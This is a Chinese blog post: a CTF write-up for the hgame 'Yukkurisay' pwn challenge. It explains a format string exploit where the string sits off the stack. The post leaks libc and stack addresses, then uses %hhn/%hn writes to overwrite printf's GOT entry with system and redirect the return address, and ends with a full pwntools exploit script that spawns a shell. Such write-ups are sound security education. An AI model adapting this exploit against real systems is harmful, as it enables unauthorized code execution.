<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="前段时间系统的学习了一下格式化字符串漏洞与利用，正好年初的hgame里有这么一道专门利用这个漏洞的题，于是写篇博客，记录一下这个漏洞的学习心得。">
<meta property="og:type" content="article">
<meta property="og:title" content="FMTSTR-YukkurisayWP">
<meta property="og:url" content="http://example.com/2023/04/15/Yukkuri/index.html">
<meta property="og:site_name" content="Luo&#39;s Blog">
<meta property="og:description" content="前段时间系统的学习了一下格式化字符串漏洞与利用，正好年初的hgame里有这么一道专门利用这个漏洞的题，于是写篇博客，记录一下这个漏洞的学习心得。">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://example.com/2023/04/15/Yukkuri/image-20230415163817705.png">
<meta property="og:image" content="http://example.com/2023/04/15/Yukkuri/image-20230415164155210.png">
<meta property="og:image" content="http://example.com/2023/04/15/Yukkuri/image-20230415164220359.png">
<meta property="og:image" content="http://example.com/2023/04/15/Yukkuri/image-20230415170109602.png">
<meta property="og:image" content="http://example.com/2023/04/15/Yukkuri/image-20230415172756484.png">
<meta property="article:published_time" content="2023-04-15T08:00:50.000Z">
<meta property="article:modified_time" content="2023-04-15T09:34:15.199Z">
<meta property="article:author" content="Luo">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2023/04/15/Yukkuri/image-20230415163817705.png">

<link rel="canonical" href="http://example.com/2023/04/15/Yukkuri/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>FMTSTR-YukkurisayWP | Luo's Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

 <script type="text/javascript" src="/js/love.js"></script>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Luo's Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/04/15/Yukkuri/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/pks.jpg">
      <meta itemprop="name" content="Luo">
      <meta itemprop="description" content="努力学安全打CTF的菜鸡x1">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Luo's Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          FMTSTR-YukkurisayWP
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2023-04-15 16:00:50 / 修改时间：17:34:15" itemprop="dateCreated datePublished" datetime="2023-04-15T16:00:50+08:00">2023-04-15</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/CTF-pwn/" itemprop="url" rel="index"><span itemprop="name">CTF-pwn</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/WP/" itemprop="url" rel="index"><span itemprop="name">WP</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>前段时间系统的学习了一下格式化字符串漏洞与利用，正好年初的hgame里有这么一道专门利用这个漏洞的题，于是写篇博客，记录一下这个漏洞的学习心得。</p>
<span id="more"></span>

<h2 id="Yukkurisay"><a href="#Yukkurisay" class="headerlink" title="Yukkurisay"></a>Yukkurisay</h2><h3 id="检查保护-分析"><a href="#检查保护-分析" class="headerlink" title="检查保护+分析"></a>检查保护+分析</h3><img src="/2023/04/15/Yukkuri/image-20230415163817705.png" class="" title="image-20230415163817705">

<p>首先检查保护，看到开了canary和NX。</p>
<p>然后进ida，源码：</p>
<img src="/2023/04/15/Yukkuri/image-20230415164155210.png" class="" title="image-20230415164155210">

<img src="/2023/04/15/Yukkuri/image-20230415164220359.png" class="" title="image-20230415164220359">

<p>首先是输入一串东西，然后用print_str函数打印了一个yukkuri和输入的这个buf，此时的buf在栈上。</p>
<p>在退出yukkuri这个系统之后找到了可以利用的格式化字符串，但是<strong>这个str在bss段（非栈上）</strong></p>
<p>然后我的第一个想法来了，先用上面的buf布栈，再用下面的str查看是第几个参数，发现是第8个（这个过程我就不放图了）</p>
<p>又因为这个题是开启了部分RELRO，我们<strong>可以修改got表</strong>，所以我的想法是将printf的got直接改成system，再手动输入&#x2F;bin&#x2F;sh来getshell。</p>
<h3 id="思路实现"><a href="#思路实现" class="headerlink" title="思路实现"></a>思路实现</h3><ul>
<li>首先我们要找到system地址，也就是泄露libc，但是又因为开了canary，所以思路是找到栈上的脏数据（IOstderr）去找到libc版本</li>
<li>泄露到libc版本的同时也要将栈地址泄露出来，因为后续格式化字符串写完地址之后要返回到下面的gift处，所以格式化字符串也要顺路修改返回地址</li>
<li>然后就是布栈等等过程，先一步步来</li>
</ul>
<h3 id="EXPloit"><a href="#EXPloit" class="headerlink" title="EXPloit"></a>EXPloit</h3><img src="/2023/04/15/Yukkuri/image-20230415170109602.png" class="" title="image-20230415170109602">

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">payload1=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x97</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x01</span></span><br><span class="line">r.sendafter(<span class="string">&#x27;What would you like to let Yukkri say?&#x27;</span>,payload1)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;b&#x27;</span>)</span><br><span class="line">IOstderr_libc=u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(IOstderr_libc))</span><br></pre></td></tr></table></figure>

<p>看图可以找到脏数据的地址并泄露，栈地址也在图中可以找到，同理我就不放泄露栈的代码了</p>
<p>这里要注意就是要顺序泄露地址，因为输入就是输入了，不会再复原脏数据。</p>
<h4 id="布栈"><a href="#布栈" class="headerlink" title="布栈"></a>布栈</h4><p>上面分析的时候说过，我们要把要修改的东西先利用循环里的buf放到栈里，所以我们这里先想想要修改些什么：print的got表地址，返回地址；</p>
<p>返回地址方面，看一下ida，只需要修改两个字节就可以了，got表地址这里我们只需要修改三个字节（libc偏移只包括后三个字节）</p>
<p>所以栈实际上应该布置成这样：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload3=p64(pri_got)+p64(stack_addr+<span class="number">0x118</span>)+p64(pri_got+<span class="number">1</span>)</span><br></pre></td></tr></table></figure>

<p>pri_got是printf的got表地址，第二个是返回地址，第三个+1是因为小端序，低位保存在低地址，+1直接把最后一个字节推走，留下我们需要修改的printf的got表的低二三字节。</p>
<p>这里还涉及一个问题就是格式化字符串修改地址的时候根据%n，但是：</p>
<ul>
<li>%n这个东西是从小到大的</li>
<li>三个字节我们需要修改两次，一次是hhn一个字节，一次是hn两个字节</li>
</ul>
<p>根据ida，我们要把返回地址0x40170e改成401671，所以要修改两个字节，顺序就出来了：</p>
<p>1、首先是system的低1字节</p>
<p>2、170e-&gt;1671（system二三字节比1671大的可能性很高）</p>
<p>3、system的二三字节</p>
<p>综上，布栈完毕。</p>
<h4 id="fmt修改"><a href="#fmt修改" class="headerlink" title="fmt修改"></a>fmt修改</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">r.sendlineafter(<span class="string">&#x27;else?(Y/n)&#x27;</span>,<span class="string">b&#x27;n&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(system_addr))</span><br><span class="line">sys1=system_addr&amp;<span class="number">0xff</span></span><br><span class="line">sys2=(system_addr&gt;&gt;<span class="number">8</span>)&amp;<span class="number">0xffff</span></span><br><span class="line">gift_addr=gift&amp;<span class="number">0xffff</span></span><br><span class="line">payload4=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(sys1)+<span class="string">&#x27;c%8$hhn&#x27;</span>+<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>((gift_addr)-(sys1))+<span class="string">&#x27;c%9$hn&#x27;</span>+<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(sys2-gift_addr)+<span class="string">&#x27;c%10$hn&#x27;</span></span><br><span class="line">r.sendlineafter(<span class="string">&#x27;gift for you: \n&#x27;</span>,payload4)</span><br></pre></td></tr></table></figure>

<p>首先退出循环，用与运算将各字节数据拿出来，然后用str字符串往栈里写。</p>
<p>为什么要减去，因为每次格式化字符串写的时候是包括前面的，而且我们也只有一次机会去写入。</p>
<p>贴个效果图：</p>
<img src="/2023/04/15/Yukkuri/image-20230415172756484.png" class="" title="image-20230415172756484">

<p>左边system和右边对照，改成，本地打通。</p>
<p>这里我时不时会遇到没改对也能打通的情况，好像原因是因为我断点打的有点问题？</p>
<p>总之思路是这样没什么问题，下面放一个完整的exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(arch=<span class="string">&#x27;amd64&#x27;</span>,os=<span class="string">&#x27;linux&#x27;</span>)</span><br><span class="line">r=process(<span class="string">&#x27;./fmt&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;fmt&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload1=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0x97</span>+<span class="string">b&#x27;b&#x27;</span>*<span class="number">0x01</span></span><br><span class="line">r.sendafter(<span class="string">&#x27;What would you like to let Yukkri say?&#x27;</span>,payload1)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;b&#x27;</span>)</span><br><span class="line">IOstderr_libc=u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(IOstderr_libc))</span><br><span class="line"></span><br><span class="line">IOstderr_offset=<span class="number">0x21a6a0</span></span><br><span class="line">libc_base=IOstderr_libc-IOstderr_offset</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(libc_base))</span><br><span class="line">system_offset=<span class="number">0x050d60</span></span><br><span class="line">system_addr=libc_base+system_offset</span><br><span class="line"></span><br><span class="line">payload2=<span class="string">b&#x27;a&#x27;</span>*<span class="number">0xff</span>+<span class="string">b&#x27;c&#x27;</span>*<span class="number">0x01</span></span><br><span class="line">r.sendlineafter(<span class="string">&#x27;else?(Y/n)&#x27;</span>,<span class="string">b&#x27;y&#x27;</span>)</span><br><span class="line"></span><br><span class="line">r.send(payload2)</span><br><span class="line">r.recvuntil(<span class="string">b&#x27;c&#x27;</span>)</span><br><span class="line">stack_addr=u64(r.recv(<span class="number">6</span>).ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))-<span class="number">0x120</span></span><br><span class="line">success(<span class="string">&#x27;stack_addr:&#x27;</span>+<span class="built_in">hex</span>(stack_addr))</span><br><span class="line"></span><br><span class="line">r.sendlineafter(<span class="string">&#x27;else?(Y/n)&#x27;</span>,<span class="string">b&#x27;y&#x27;</span>)</span><br><span class="line"></span><br><span class="line">pri_got=elf.got[<span class="string">&#x27;printf&#x27;</span>]</span><br><span class="line">payload3=p64(pri_got)+p64(stack_addr+<span class="number">280</span>)+p64(pri_got+<span class="number">1</span>)</span><br><span class="line">r.send(payload3)</span><br><span class="line"></span><br><span class="line">gift=<span class="number">0x401671</span></span><br><span class="line">r.sendlineafter(<span class="string">&#x27;else?(Y/n)&#x27;</span>,<span class="string">b&#x27;n&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;system_addr=&quot;</span>+<span class="built_in">hex</span>(system_addr))</span><br><span class="line">sys1=system_addr&amp;<span class="number">0xff</span></span><br><span class="line">sys2=(system_addr&gt;&gt;<span class="number">8</span>)&amp;<span class="number">0xffff</span></span><br><span class="line">gift_addr=gift&amp;<span class="number">0xffff</span></span><br><span class="line">payload4=<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(sys1)+<span class="string">&#x27;c%8$hhn&#x27;</span>+<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>((gift_addr)-(sys1))+<span class="string">&#x27;c%9$hn&#x27;</span>+<span class="string">&#x27;%&#x27;</span>+<span class="built_in">str</span>(sys2-gift_addr)+<span class="string">&#x27;c%10$hn&#x27;</span></span><br><span class="line">r.sendlineafter(<span class="string">&#x27;gift for you: \n&#x27;</span>,payload4)</span><br><span class="line">gdb.attach(r)</span><br><span class="line">pause()</span><br><span class="line">sleep(<span class="number">0.5</span>)</span><br><span class="line">r.sendline(<span class="string">b&#x27;/bin/sh\x00&#x27;</span>)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>这道题是一个典型的非栈上格式化字符串的题，知识点很多很复杂也很有意思。</p>
<p>该说不愧是hgame？让我这种菜鸡学会了这方面的一小点知识？</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
      </footer>
    
  </article>
  
  
  



          </div>
          
    
  <div class="comments">
    <div id="lv-container" data-id="city" data-uid="MTAyMC81ODM1Mi8zNDgxNQ=="></div>
  </div>
  

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Yukkurisay"><span class="nav-number">1.</span> <span class="nav-text">Yukkurisay</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A3%80%E6%9F%A5%E4%BF%9D%E6%8A%A4-%E5%88%86%E6%9E%90"><span class="nav-number">1.1.</span> <span class="nav-text">检查保护+分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%9D%E8%B7%AF%E5%AE%9E%E7%8E%B0"><span class="nav-number">1.2.</span> <span class="nav-text">思路实现</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#EXPloit"><span class="nav-number">1.3.</span> <span class="nav-text">EXPloit</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%B8%83%E6%A0%88"><span class="nav-number">1.3.1.</span> <span class="nav-text">布栈</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#fmt%E4%BF%AE%E6%94%B9"><span class="nav-number">1.3.2.</span> <span class="nav-text">fmt修改</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.4.</span> <span class="nav-text">总结</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Luo"
      src="/images/pks.jpg">
  <p class="site-author-name" itemprop="name">Luo</p>
  <div class="site-description" itemprop="description">努力学安全打CTF的菜鸡x1</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">1</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Luo</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>


        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

<script>
NexT.utils.loadComments(document.querySelector('#lv-container'), () => {
  window.livereOptions = {
    refer: location.pathname.replace(CONFIG.root, '').replace('index.html', '')
  };
  (function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
  })(document, 'script');
});
</script>

</body>
</html>
